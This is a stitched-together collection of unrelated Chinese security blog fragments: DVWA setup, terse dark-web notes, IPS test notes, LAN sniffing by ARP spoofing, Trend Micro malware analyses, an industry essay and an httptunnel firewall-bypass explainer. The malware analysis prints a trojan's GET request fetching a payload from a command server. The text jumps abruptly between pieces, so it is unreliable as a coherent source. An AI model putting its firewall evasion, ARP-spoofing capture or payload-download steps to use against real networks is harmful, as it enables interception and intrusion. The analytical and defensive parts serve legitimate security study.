DVWA介绍 DVWA(Damn Vulnerable WebApplication)是一个基于PHP和MySQL的Web应用,用于学习与审计Web漏洞、测试安全技能的工具,比如检查代码中是否存在SQL注入、XSS攻击等安全漏洞。
PHP环境部署 因为DVWA是用PHP编写的,因此需要搭建PHP运行环境。常见的集成环境有phpStudy、XAMPP等,这里我使用的是phpStudy,其安装十分便捷。可以从官网(http://www.phpstudy.net/)下载。
当出现如图两个绿点表示正常运行。如果出现Apache启动后又停止的情况,可能是端口冲突,你可以更换http服务的默认80端口试一下,当然也不排除是其他原因造成的。
DVWA的部署 从DVWA官网(http://www.dvwa.co.uk/)直接下载,然后解压到你的phpStudy安装目录下的WWW文件夹中,比如笔者的D:\Program Files\phpStudy\WWW\DVWA-master。
此时在浏览器中输入http://:/DVWA-master/setup.php会提示一段错误信息。你需要根据提示将config文件夹下的config.inc.php.dist中的$_DVWA[ ‘db_password’ ] = ‘p@ssw0rd’; 改成 $_DVWA[‘db_password’ ] = ‘root’;。因为我们的MySQL用户名、密码默认都是root,再复制一份到config文件夹下,重命名为config.inc.php,此时再打开网址就会变成下图:
点击Create/Reset Database,创建数据库。随后页面自动跳转到login.php,输入用户名admin,密码password后点击Login即可登录。
登陆后出现DVWA的主页面,表示环境配置成功。
ENJOY IT!
Dom Xss Test Cases Wiki :https://code.google.com/archive/p/domxsswiki/ 黑客之门(有很多网络安全相关的网站的链接):http://www.hackerdoor.com/ 红黑联盟:https://www.2cto.com/ T00LS: https://www.t00ls.net/ 暗安全技术小组:http://forum.cnsec.org/ freebuf:http://www.freebuf.com
保护隐私防止被追踪
志愿者组成
长期在天朝完全无法使用
感谢 云
暗网
互联网搜索引擎无法发现
互联网黑市
下载和看视频是不道德的行为
互联网黑市交易的货币是比特币
比特币很难在互联网复原
下载
http://www.torproject.org/download/download-easy.html.en#linux
http://pan.baidu.com/s/1sjkdPO5
问题1:should not be run as root;
问题2:服务启动错误
a
暗网wiki
http://zqktlwi4fecv6ri.onion/wiki/index.php/main_Page
root@kali:~/Desktop# ls -l
-rwxr-xr-x 1 root root 251 6月 15 14:41 goagent-gtk.desktop
-rwxrwx— 1 root root 44083644 6月 15 10:27 tor-browser-linux64-4.5.1_zh-CN
drwx—— 3 1000 inetsim 4096 6月 15 18:23 tor-browser_zh-CN
root@kali:~/Desktop# chown -R root:root tor-browser_zh-CN/ //赋予执行权限
root@kali:~/Desktop# ls -l
-rwxr-xr-x 3 root root 44083644 6月 15 10:27 tor-browser_linux64-4.
时间:2017/07/15 地点:杭州 工作2年,测试IPS产品,整理总结下与入侵检测相关的技术,借此系统性的学习一次。
02.网络入侵方法及IPS产品防护能力测试方法
1、 了解网络入侵的目的 作为网络安全防护人员,要想更好的做到网络防御,必须做到有的放矢,因此就需要了解入侵者的思维方式、流程及其手段。通过这些信息利用安全设备和安全检测工具来阻击入侵,对攻击进行溯源取证及安全防护。
2、 网络入侵一般流程 (1)确定目标 (2)信息收集 (3)漏洞挖掘。包括漏洞扫描和漏洞分析 (4)实施攻击。攻击对象分为网络和主机系统 (5)留下后门。上马,提权 (6)清除日志。隐藏自己
3、 入侵方法总结 【1】按被入侵对象分: (1)主机渗透方法 口令破解 漏洞攻击 木马攻击 病毒攻击 社会工程 (2)网络攻击方法 拒绝服务攻击 地址欺骗 网络监听 病毒攻击 社会工程 【2】按产品防护功能的实现来区分: (1)入侵攻击 (2)病毒传播 (3)拒绝服务 (4)社会工程 (5)敏感信息外传
4、入侵防御系统防护能力测试 【1】入侵防御系统防护功能模块 评价一款入侵防御系统产品防护能力是否强大,首先需要具备多种不同的攻击防护模块,也就是具备多种不同的攻击防护能力。在不考虑各模块间耦合问题的情况下,一般防护功能模块越多,防护能力也就越强大。 【2】入侵防御系统防护安全威胁类型
使用 Debookee 抓取同局域网内设备数据包,太神奇了。
因为有个需求,就是想看某手机app内部网络部分是如何实现的,所以要抓取其数据包(主要是 Http 协议部分),Windows 下可以用 Fidder 为手机设置代理实现,Mac 下有一款 Debookee 的软件可以实现同样的功能,但是原理不同 Fidder 设置代理。首先先看截图:
这是扫出来的局域网内所有主机情况:
将目标主机设置为 target,此处是我的手机,然后再点击左上角的 Start Dbk,就会抓取到手机上的数据包,如图:
很神奇,什么都不用设置,只要在 Debookee 上点几下,同个局域网中所有设备数据包我都能监控到了。基于什么原理呢?
我的另一台 Samsung 电脑打开了 Wireshark 抓取数据包,发现 Debookee 只要一扫描或者对其抓包,就会有满屏幕的 ARP 欺骗–所以原理也就清楚了,是基于 ARP 欺骗的(感谢大哥教导),如图:
其实很简单,最后,视频演示下吧: http://7xivx9.com1.z0.glb.clouddn.com/debookeeDebookee.mp4
总的来说,这款工具非常好用!—— Debookee
另外,还有另一种方式,即通过设置中间代理的方式来抓包,在我的这篇文章中有讲解 Charles 的安装破解与使用
个人GitHub: http://github.com/icodeu CSDN博客:http://icodeyou.com 个人微信号:qqwanghuan 技术交流
此法适用于原理虚拟机能够正常上网,但是后来多半是因为非法关机,导致网络突然被禁用,笔者常见的现象是虚拟机右上角的“小电脑”呈暗黑色,点击显示网络已被禁用。
笔者这么乱搞了一通,可以上了,具体原因不明,但是能用就记下。
1、sudo rm /var/lib/NetworkManager/NetworkManager.state 2、sudo service NetworkManager stop
3、sudo service NetworkManager start
作者:趋势科技资深威胁研究员 Jessa dela Torre /NartVilleneuve
“Watering Hole(水坑)”是用来描述针对性恶意软件攻击时,攻击者入侵合法网站插入一个“偷渡式”漏洞攻击代码,借此攻击网站访客的流行用语。
当然,这种攻击并不是最新的。这项技术一直被网络犯罪份子用在无差别攻击,以及针对性恶意软件攻击上。我在2009年和2010 年记录了这种技术,而这里有更多最近的例子。
虽然网络犯罪份子利用偷渡式漏洞攻击码是为了能够不分对象地攻击入侵更多计算机,而使用这种技术的APT 高级持续性渗透攻击活动则被Shadowserver 恰当地描述为“策略式网站入侵”。目标的选择是针对攻击对象会感兴趣的特定内容。这种攻击通常会结合新的偷渡式漏洞攻击码。
最近,一个影响微软Internet Explorer 的零时差漏洞攻击码被发现位于跟Nitro 攻击活动有关的服务器上,和最近用来提供Java 零时差漏洞攻击码是同一台服务器。它们的有效负荷都是PoisonIvy。第二个放有Internet Explorer 零时差漏洞攻击码的网站很快就被发现,不过它的有效负荷是PlugX。
整体而言,我们已经发现了至少 19 个网站包含IE 零时差漏洞攻击码。虽然无法完全的确认,但至少有部分网站属于“水坑”攻击。
{BLOCKED}h2.mysoft.tw
{BLOCKED}tix.com
get.{BLOCKED}s.com
ie.{BLOCKED}1.co.uk
info.{BLOCKED}u.edu.tw
invitation.{BLOCKED}as.com
{BLOCKED}fessional-symposium.org
{BLOCKED}o.konkuk.ac.kr
service.{BLOCKED}a.com.tw
{BLOCKED}k.vip-event.info
update.{BLOCKED}alive.com
w3.{BLOCKED}u.edu.tw
www.as.{BLOCKED}e.edu.tw
www.{BLOCKED}news.in
www.{BLOCKED}gameshow.com
www.{BLOCKED}e.com
www.{BLOCKED}a.org.tw
www.{BLOCKED}sia.tv
www.{BLOCKED}in.com.tw
有趣的是,这 19 个网站可以分成 14 组。换言之,除了利用此漏洞的共同点外,他们之间没有任何明显的关连。从其中 11 组中,我们发现了 11 种不同的有效负荷(其他三组,我们无法收集到有效负荷)。
除了和Nitro 相关的Poison Ivy 还有上面所提到的PlugX 远程控制木马外,趋势科技发现了其他熟悉的远程控制木马,和一些不熟悉的(至少对我来说)恶意软件。其中一个被识别出的远程控制木马是invitation.{BLOCKED}as.com 的有效负荷,被称为“DRAT”远程访问木马,这是由“DarkSecurity Team”所开发的远程访问木马,并且在网络上被广泛使用。
DRAT 是一个全功能的远程访问木马,让攻击者完全控制入侵的计算机。这个DRAT 被设定连到{BLOCKED}le.moo.com({BLOCKED}.{BLOCKED}.229.82)。
另一个特别的木马程序出现在被入侵的国防新闻网站,会访问Elderwood攻击者。这个例子中所使用的加壳程序和Hydraq 木马程序所使用一样的加壳程序,这支木马程序因为被用在对Google 和其他 30 家公司的Aurora 攻击而恶名昭彰。这支木马(被称为“NAID”)也是在 2012 年 6 月被嵌入到被入侵人权组织网站的漏洞攻击码的有效负荷。在这个例子中,一个被入侵的国防相关新闻网站被放置了会植入NAID 木马程序的IE 零时差漏洞攻击码,进而连到support.
作者:趋势科技资深威胁研究员 Natt Villeneuve
CNN 的报导也侧面证明了有恶意软件正在通过 Skype 传播,这让我们想起另一起以前发现的,会利用Skype 执行的攻击。
趋势科技发现,有个网页宣称可以提供 Skype使用的加密软件。这个网页被托管在位于叙利亚的网站 {BLOCKED}encription.sytes.net 上,网站 IP 地址是 {BLOCKED}.{BLOCKED}.{BLOCKED}.0.28。这个地址和之前一些攻击所用的命令与控制服务器完全相同。网页上有个内嵌的 YouTube 视频,声称该软件来自“IT Security Lab(安全实验室)”,可以用来加密 Skype 的语音通讯。
如果用户上当下载该文件,随后即可获得一个据称可以对用户的 Skype 数据进行加密的程序。这个程序为Skype Encription v2.1.exe,已被趋势科技命名为 BKDR_METEO.HVN。分析后,我们发现没有任何证据表明该程序可以提供所宣称的加密功能。
这个文件中包含的一个字符串证明,文件是由“SyRiAnHaCkErS”所编写的:
C:\Users\SyRiAnHaCkErS\Desktop\test\final\final\obj\x86\Debug\SkypeEncription v 2.1.pdb
运行后,该软件会执行下列网络操作:
GET/SkypeEncription/Download/skype.exe HTTP/1.1
Host: {BLOCKED}.{BLOCKED}.0.28
Connection: Keep-Alive
该操作会下载名为skype.exe 的文件,而该文件已经被确定为BKDR_ZAPCHAST.HVN,实际上这就是恶意软件DarkComet 的 3.3 版,该软件会连接到 {BLOCKED}.{BLOCKED}.0.28这一 IP 地址的 771 端口。在趋势科技的测试环境中,通过对网络通讯进行重定向,确认这实际上就是 DarkComet。
一旦安装 BKDR_ZAPCHAST.HVN,攻击者就可以通过DarkComet 远程访问木马(RAT)获得被感染系统的完全控制权。关于 DarkComet 远程访问木马的功能已经在这里和这里介绍过了。
请注意,Skype本身就会使用 AES 加密技术对语音通讯和文字通讯内容进行加密,当然视频通话也受到该技术的保护。
趋势科技的用户无需担心,您已经可以通过趋势科技云计算安全技术获得妥善保护,完全可以检测并清理掉相关恶意软件,预防所有威胁。
@原文出处:FakeSkype Encryption Software Cloaks DarkComet Trojan
本文版权为趋势科技所有,对于非赢利网站或媒体转载请注明作者以及原文链接。谢谢合作!
爱趋势社区—下载/论坛/分享 http://www.iqushi.com
官方微博—拿礼品/分享最新IT资讯 http://t.sina.com.cn/trendcloud
来源:计算机世界 原创-IT 胡英
——————————————————————————–
“城外的人想进去,城内的人想出来,人生的事,大抵如此。” 钱钟书老先生这句名言,用在信息安全领域再恰当不过。 没有进入这一领域的人,将它看成是摆脱IT困境,维持高速发展的最后一轮机会,于是,一窝蜂而上。 已经进入这一领域的人,过得好的并不多,很多在惨淡经营,有些在苦撑,有些在暗地里转型,有些干脆从此消失…… 信息安全产业并不像想象的那样充满了机会,产业在荆棘的道路上跋涉,反而处处布满了陷阱,被划上了道道“暗伤”。 我们披露这些“暗伤”,是为了引起业内更多的领导、专家、用户及厂商的重视,让幼小的信息安全产业能在一个健康有序的环境中顺利发展、壮大。 政策暗伤:收费繁多何时了? 在发展初期,政策就像一把双刃剑,在保护企业和用户的同时,由于管理的不规范,也深深刺伤了产业。 在进入信息安全产业之前,许多中国企业凭着直觉感到,这一产业似乎是国内企业在新IT时代赶超国外的最后一轮机会!因为,信息安全不仅指企业或个人的信息网络安全,它更是关系到国家安全、社会稳定的头等大事,尤其在许多专家预计不久将爆发的信息大战中,谁掌握了网络信息安全的核心技术,谁就能掌握网络信息战的制空权!谁都清楚,保卫国家安全必须依靠自己的军队,而不能依靠雇佣军,所以,这些网络安全的核心武器,必须掌握在自己人的手中!就连美国这样一个号称高度自由的国家,也于今年出台了美国《网络空间安全国家战略》,其中不仅详细说明了未来美国将面临的信息安全风险,还指出必须依靠本国自己的力量才能保证国家的安全! 在这种大环境下,国内厂商兴奋异常,国家依靠自己的力量发展自己的信息安全产业,意味着国家在资金、政策、税收等方面的扶植力度将会加大,意味着虽然我们的信息安全产业相对国外起步较晚,但国内企业具有非常高的胜算机会,而不会像以往的IT业一样,不得不被国际社会几大巨头牵着鼻子走!尤其在近年来整体IT环境下滑的情况下,信息安全无疑是国内企业的突破口。 被美好的预期冲昏了头脑,许多人来不及仔细思索便一猛子扎进了信息安全江湖!却不知,刚刚潮起的信息安全领域,里面布满了暗礁和荆棘。在发展初期,政策就像一把双刃剑,在保护企业和用户的同时,由于管理的不规范,也深深刺伤了产业。 很多人以为获得了公安部的销售许可就算是领到了进入这一领域的“许可证”,但只有那些在此领域“混”得稍久的“老牌厂商”才了解里面的“难言之隐”:公安部的销售许可只是进入这一行业的第一道门槛,随后,进入军队系统要有军队许可、进入涉密网要获得保密许可、产品质量保证要获得安全部门的许可。这就是业内许多厂商自嘲又无奈的“公保机盯”大餐。此外,各个行业还专门自设了自己的“入围选型”门槛,如进入金融业要获得金融选型入围,进入电信网要获得电信选型入围……这几道门槛,就像几块大石,压得幼小的企业抬不起头,许多企业不堪重负,甚至夭折。 之所以有这么多的“许可门槛”、“认证门槛”,是因为里面有着巨大的经济利益。一位国内信息安全企业老总给记者算过一笔账:企业研究出一种新的信息安全产品,如果要拿齐这几种许可证,至少得花10万元人民币,这还只是新产品的价码,不包括产品升级换代的费用。一个企业不可能只研制一种信息安全产品,一般来说会有3~5种产品,每种产品一年中很可能升级1~2次,仅各类认证费用,一个企业一年就得花上百万元人民币! 国家对信息安全产业实行许可证管理制度本无可厚非,这是为了保障广大用户的合法权益,保证产品的质量,也保障信息安全企业的合法利益。但问题的关键是,需不需要如此多的部门进行多重认证?作为发放许可证的职能机构,需不需要索取这样高额的费用? 乱收费现象严重,已经深深制约了刚刚起步的国内信息安全企业的发展,以至于业内出现了一个很奇怪的现象: 国外企业的产品反正进不了那几个关键部门,于是不需要拿那么多的许可证,反而凭借技术、资金实力而一身轻松地攻打大行业,如金融、电信等企业领域,而对本来就弱小的国内企业而言,在大行业内没有实力与国外企业竞争,进入关键部门又有这道道收费门槛,无疑是雪上加霜! 由此出现一个无奈的现象,很多国内企业不愿意进行产品升级,即使升了级,也不愿意大肆渲染,对外还宣称产品改动不多。一家很著名的企业,明明在防火墙和入侵检测系统中对产品进行了重新设计和巨大的改造,但在版本号中只是从3.0升级到了3.1,对外显示产品变化不大。这家企业老总说:我们也很无奈,谁不希望说自己的企业有技术含量,具备快速更新换代的能力,但如果说产品改变巨大,接下来就是大笔认证费用等着你,在防火墙市场竞争如此激烈的情况下,我们什么时候才能收回这笔费用啊? 有专家认为,近年来,公路乱收费现象严重,国家已开始抓紧整顿治理,而在信息安全产业道路上的乱收费现象同样严重,同样需要国家下大力整顿,否则,发展我国自主的信息安全产业只是一句空话而已。 据悉,一家机关媒体通过新闻内参的形式已经向中央有关领导反映了此事,目前,中央有关领导已经有了明确的批示,要对信息安全产业乱收费现象进行整顿治理,这无疑是产业的利好消息,产业急切地盼望政策环境改善的那一天早日到来。
市场暗伤:只见森林,不见树木?
中国信息安全产业一年的产值只有区区十多亿元,还不及短信在春节黄金周期间短短的8天里创造的70多亿元产值的三分之一,这真令人失望! 虽然产业发展呼声极高,不时出现的黑客攻击事件也在不断地提醒着业内的人们要高度重视信息安全建设,企业在进行IT投资时,也在不断加大对信息安全的投资比例,但信息安全整体市场究竟有多大?值不值得人们趋之若骛、一窝蜂地投入到产业内?恐怕许多人没有深思过。 中国整体信息安全市场的数字究竟有多大?一段时间以来,业内流行的数据是,2002年中国的信息安全市场达到了40亿元人民币,统计渠道不得而知,也许就像中国的许多数据一样是某些专家“拍脑袋”得出的。虽然IDC公司对2002年的数据还没有统计出来,但从IDC2001年的数据来分析,IDC预计2002年中国的信息安全市场只有16亿元人民币。两者相差2倍多,这不得不让人迷惑。 专家分析,这种现状是必然的,这是由于信息安全产业的特殊性造成的。大量采用信息安全产品的用户“养在深闺,足不出户”,因为,谁也不愿意将自己需要保护的系统对外宣传,引起广泛的注意,因为,谁也不能保证自己的系统是万无一失的。此外,军队、政府等特殊部门的应用情况从来不对外公布,这就造成了统计渠道的不畅和统计数据的混乱。 但是,从信息安全厂商的销售数据来看,我们或许可以得出些结论。据记者了解,一般在中国的大型信息安全厂商(包括本土企业和在中国的外企)一年的销售额只有几千万元人民币,最大的1~2家也声称刚刚超过了1亿元人民币,而大部分企业在信息安全领域的销售额只有几百万元人民币,如此一来,虽然在册的从事信息安全销售的厂商数超过了千家,但总体销售数据依然很小! 中国信息安全产业一年的产值只有区区十多亿元,还不及短信在春节期间短短的8天内创造的70多亿元产值的三分之一,这真令人失望! 其实,仔细思索,这也不奇怪,产值不大但责任重大,是信息安全产业的主要特点。一个企业无论对信息安全产业如何重视,但一般对它的投资仅占IT总体投资的15%左右,最依赖IT生存的企业对它的投资也不会超过IT总体投资的50%。毕竟,信息安全产业是依附于信息产业发展而发展的一个小门类,要想将产业做大很难! 专家用“只见森林,不见树木”来形容产业的现状。我们能看到前景,但要看清楚直至挖到财富,依然要走很长的路! 厂商数量太多、规模普遍偏小,不仅使厂商的抗风险能力极差,也影响风险投资的进入,如果没有风险资金的进入,缺乏资金的老问题又会困扰企业的发展,不利于产业的迅速扩张。据悉,有关专家已经看到了这一问题,并提出,“减少数量、扩大规模”是2003年中国信息安全产业的主要目标。 好在信息安全产业每年50%以上的增长速度足以令人兴奋,就凭这一点,也足以成为习惯了长期高速发展的中国IT企业继续保持高速发展的新的经济增长点。只是,作为准备涉足这一领域的厂商,进入之前一定要有充分的思想准备和资金技术储备。 产品暗伤:谁了解用户需求?
大多数厂商在防火墙、IDS、反病毒、VPN等几类主流的产品中,拼杀得“你死我活”,而用户需要的一些专业的安全防护工具在市场却难觅踪影,这就是业内专家所说的“产业结构失衡”状态。 提起信息安全,很多人自然联想到防火墙、IDS、杀病毒、VPN等耳熟能详的产品,于是,很多厂商以这几类产品切入信息安全领域,然后逐渐扩张到信息安全的其他门类。那么,作为用户又是如何想的呢? 跟踪信息安全领域两年多,记者多次与用户交流,发现很多大型行业用户在考虑信息安全问题时,首先考虑如何进行组织机构的调整,如何在现有网络拓扑的基础上制定信息安全策略,最后才考虑采用信息安全产品的问题。换言之,信息安全产品在用户心目中的位置排在最后,并且只是作为实现策略的工具而已。 一位在银行负责信息安全的处长说,很多厂商提供的产品根本满足不了我们的需求,他们提供的是产品,而我们需要的是适合自己银行网络拓扑结构的安全策略,虽然很多厂商也说能提供策略咨询服务,但那些策略要么是站在产品立场上的咨询服务,要么是纸上谈兵,并不适合我们的网络结构,而由于银行网络的保密性,我们很难将自己的需求直接告诉厂商。于是,不得已,我们只有自己学习,自己制定安全策略,自己选择产品。 据记者了解,在市场上,大多数厂商还是以提供产品为主,虽然也打整体解决方案的大旗,虽然也号称提供安全咨询服务,但正如用户的理解,这些服务都是建立在产品基础上的服务,是为了卖产品而为用户画的一个饼! 于是,一方面,用户对信息安全有着强烈的需求,另一方面,信息安全厂商的规模和利润做不大,因为,中间缺少一个必要的环节,那就是专业的信息安全服务。专家分析,实施信息安全工程就像实施 ERP一样,企业首先必须进行流程重组(在信息安全领域是进行组织机构、人员的重组)后,才能利用各种安全工具实施安全策略。 市场呼唤中立的、专业的信息安全服务厂商,但它们的生存状态又怎么样呢?记者也曾接触过一些这样中立的服务公司,但它们普遍生存状态不佳。一方面,人们的观念还没有更改过来,为服务单独付一大笔费用在某些用户的观念中还很难接受;另一方面,这些新成立的中立性服务公司还没有创出品牌,其咨询水平还很难让人信服。
在信息安全领域,需求与供给的矛盾日渐突出。 大多数厂商提供的产品依然集中在防火墙、IDS、反病毒、VPN等主流上,使产业走上了一条“千军万马过独木桥”的现象,在这几类主流的产品中,厂商拼杀得“你死我活”,而用户需要的一些专业防护安全产品,如审计工具、预防入侵工具等,市场却难觅踪影,这就是业内专家所说的“产业结构失衡”状态。 造成这种现状的原因一方面是进入这几类主流产品领域的技术门槛近年来已经极大降低,投入点资金就能顺利地开发自己的防火墙、IDS等产品;另一方面,很多厂商不了解信息安全领域囊括的产品门类多、技术含量高的特点,致使其他新类别的产品因为厂商缺乏创新性而无人问津,使整个产业缺乏创新意识。 根据记者的了解,具有创新性的安全产品目前在市场上依然非常紧俏。例如,记者曾编发过一篇一个厂商推出了专业防止宽带偷盗新品的新闻,新闻发出不久,就收到了读者的反馈,要求与厂商联系购买产品,不经意间,记者促成了一笔生意。由此可见,用户因为自身安全需求一直在不断寻找适合自己的安全新产品,而厂商的产品只要能解决特定安全问题,总会有用户需要,厂商所面临的竞争环境也不会那么激烈。 对业内的厂商而言,多动动脑筋开发一些功能性能独特的产品,是不是比跟在别人后面,“人云亦云”挤在狭小的空间中竞争更有意义呢? 应用暗伤:谁能将产品用好?
很多企业即使买来了信息安全产品,但事故依然不断,安全还是得不到保障。为什么呢?这至少让用户对信息安全产业的信心大打折扣! 以上四类主流产品之所以在信息安全领域产值所占比例较高,成为众厂商追捧的对象,是因为其所覆盖的应用领域较广的缘故,除了在那些大的行业,如金融、电信、政府、民航、电力等严重依赖信息化的行业对它有需求外,一些中小企业在保护自己的企业网安全时,首先就想到了这四种产品,正因为中小企业的关注,才显示出它们在数量上的优势,显示出在产业中所占产值比例较高,因此,其重要性的权重也相应加大。 但对那些广大的中小企业,即使买来了信息安全产品,为什么事故依然不断,安全还是得不到保障呢?这至少让用户对信息安全产业的信心大打折扣! 以今年1月25日流行的Slammer病毒攻击为例,几个小时之内,病毒席卷全球,攻击了全球成千上万的网络,其实,病毒所依据的只是微软去年7月份就发布了补丁程序的SQL数据库的漏洞,那么,为什么还有那么多的网络“中毒”?这是因为用户没有及时打上补丁,其中,很多用户不知道要打补丁,也有很多用户是抱着侥幸心理懒得打补丁。换句话说,是用户信息安全意识不强或对已有产品使用不当造成的。 而更多的情况是,作为广大中小企业的用户,本身并没有信息安全专业人员,即使有那么1~2个技术人员,也只是普通的IT人员,对信息安全知识一知半解,对信息安全产品似懂非懂,这就注定了无法将产品用好! 记者曾经接触过几个这样的用户,网络防毒产品买了来自不同厂商的2套,之所以这样做,只是因为不会用以前的老版本,而厂商的服务又不到位,于是干脆换一家服务好、好用的产品,反正花的不是自家的钱。另一些情况是,有些用户对防火墙的配置策略基本上半年甚至一年都不变,一旦需要变化,却由于没有懂得相关配置的人员而束手无策,因此,每次更换策略都依赖于厂商人员的上门服务,厂商对此不堪重负,而用户也甚感不方便。 应用的不到位有几个方面的原因:一是用户对信息安全产品本身的认识不足,以为凭几个网管员就可以管好整个网络的安全,而舍不得在信息安全的人员培训方面进行再投资。这其实是应用上的最大误区,因为IT与信息安全是完全不同的学科,专业的IT人员不一定是专业的信息安全人员,专业的信息安全人员必须经过再培训的过程。国家已认识到这一问题,目前正在制定信息安全维护人员持证上岗制度,保证上岗人员的质量。 应用不到位的另一个重要原因是厂商的服务不到位,虽然很多厂商号称自己已经转型为安全服务厂商,但提供的服务多数是前述的安全咨询服务或产品的售后服务,而惟独缺少对产品应用的运维服务。对信息安全产业而言,这是维持信息安全产业链的一个必要的环节,也是考验厂商实力的指标。信息安全的运维服务不能像PC的后期服务一样,换某些板卡就能解决问题,而是需要让渠道同样具有安全服务能力,能为用户提供贴身的服务,这就要求厂商对渠道服务进行深入培训,建立良好的对渠道的掌控能力,而这需要时间的积累。 用户对信息安全产品应用得不好,直接影响信息安全产品的推广,产品推广不出去,直接影响信息安全产业,成为制约产业发展的另一主要障碍。
由http暗藏通道看网络安全 内容: 什么是http暗藏通道 什么是Httptunnel Httptunnel带来的安全问题 一些解决思路 总结 参考资料 关于作者 宫一鸣 ([email protected])
中国电信网络安全小组核心成员
2001 年 12 月
通过本文的httptunnel 技术同时逃过了防火墙的屏蔽以及系统的追踪试验,我们可以看到网络安全仅仅依靠某种或某几种手段是不可靠的,同时对安全系统的盲目性依赖往往会造成巨大的安全隐患。希望通过本文能引起管理员对网络安全防护系统的思考。 什么是http暗藏通道 什么是局域网安全,系统管理员怎样才能保障局域网的安全?这是一个不断变化的安全概念,很长的一个时期以来,在局域网与外界互联处放置一个防火墙,严格控制开放的端口,就能在很大程度上掌握安全的主动权,方便的控制网内外用户所能使用的服务。比如,在防火墙上仅仅开放80,53两个端口,那么无论是内部还是外面的恶意人士都将无法使用一些已经证明比较危险的服务。
但要注意一点,防火墙在某种意义上是很愚蠢的,管理员对防火墙的过分依赖以及从而产生的懈怠情绪将不可避免的形成安全上的重大隐患,作为一个证明,”通道”技术就是一个很好的例子,这也是本文要讨论的。
那么什么是通道呢?这里所谓的通道,是指一种绕过防火墙端口屏蔽的通讯方式。防火墙两端的数据包封装在防火墙所允许通过的数据包类型或是端口上,然后穿过防火墙与对端通讯,当封装的数据包到达目的地时,再将数据包还原,并将还原后的数据包交送到相应的服务上。举例如下:
A主机系统在防火墙之后,受防火墙保护,防火墙配置的访问控制原则是只允许80端口的数据进出,B主机系统在防火墙之外,是开放的。现在假设需要从A系统Telnet到B系统上去,怎么办?使用正常的telnet肯定是不可能了,但我们知道可用的只有80端口,那么这个时候使用Httptunnel通道,就是一个好的办法,思路如下:
在A机器上起一个tunnel的client端,让它侦听本机的一个不被使用的任意指定端口,如1234,同时将来自1234端口上的数据指引到远端(B机)的80端口上(注意,是80端口,防火墙允许通过),然后在B机上起一个server,同样挂接在80端口上,同时指引80端口的来自client的转发到本机的telnet服务端口23,这样就ok了。现在在A机上telnet本机端口1234,根据刚才的设置数据包会被转发到目标端口为80的B机,因为防火墙允许通过80端口的数据,因此数据包畅通的穿过防火墙,到达B机。此时B机在80端口侦听的进程收到来自A的数据包,会将数据包还原,再交还给telnet进程。当数据包需要由B到A返回时,将由80端口再回送,同样可以顺利的通过防火墙。
实际上tunnel概念已经产生很久了,而且很有可能读者使用过类似的技术,比如下面的网址http://www.http-tunnel.com。它是一个专业提供tunnel服务的公司,通过他们的在线tunnel server,局域网内的用户可以使用被防火墙所屏蔽的ICQ,E-MAIL,pcanywhere, AIM,MSN, Yahoo,Morpheus,Napster等等诸多软件。我们看到,这里有ICQ,Napster等软件,相信我们的读者很多都使用过走proxy的ICQ,OICQ等等,其实他们的原理是差不多的。
什么是Httptunnel 作为一个实际的例子,我们下面来介绍一个在”非公开领域”使用的的通道软件,httptunnel。在httptunnel主页(请参阅参考资料)上有这么一端话,
httptunnel creates a bidirectional virtual data connection tunnelled in HTTP requests. The HTTP requests can be sent via an HTTP proxy if so desired. This can be useful for users behind restrictive firewalls. If WWW access is allowed through a HTTP proxy, it’s possible to use httptunnel and, say, telnet or PPP to connect to a computer outside the firewall.